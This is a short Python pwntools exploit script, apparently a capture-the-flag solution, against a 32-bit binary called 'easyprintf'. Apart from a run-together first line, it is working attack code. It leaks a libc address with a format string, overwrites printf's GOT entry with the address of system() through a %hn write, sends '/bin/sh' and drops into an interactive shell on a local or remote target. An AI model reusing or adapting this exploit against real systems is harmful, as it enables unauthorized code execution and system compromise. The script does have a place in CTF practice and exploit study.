from pwn import *import sysimport timecontext.arch = 'i386'if len(sys.

1. from pwn import *
2. import sys
3. import time
4.  
5. context.arch = 'i386'
6. if len(sys.argv) < 2:
7.     p = process('./easyprintf')  
8.     context.log_level = 'debug'
9. else:  
10.     p = remote(sys.argv[1], int(sys.argv[2]))
11.    
12. p.writeline("%35$x")
13. ret = p.recv(2048)
14. main_base = int(ret[0:8], 16) - 241
15. libc = ELF('/lib/i386-linux-gnu/libc-2.27.so')
16. sysaddr = main_base - libc.symbols['__libc_start_main'] + libc.symbols['system']
17. # readelf -a /lib/i386-linux-gnu/libc-2.27.so |grep "main@"
18. print("%x" % sysaddr)
19.  
20. printfaddr = 0x0804c014
21.  
22. log.info('start send')
23. dest = p32(printfaddr) # readelf -r easyprintf
24. dest2 = p32(printfaddr + 2)
25.  
26. low = (sysaddr & 0xffff)-8
27. high = (sysaddr>>16 & 0xffff)-low+8
28. print(low, high)
29.  
30. payload = dest + dest2 + (b'%%.%dx' % low) + b'%8$hn' + (b'%%.%dx' % high) + b'%7$hn'
31. print(payload)
32.  
33. p.writeline(payload)
34. log.info('send over')
35. sleep(2)
36. payload = '/bin/sh'
37. p.writeline(payload)
38.  
39. log.info('get shell!!')  
40. p.interactive()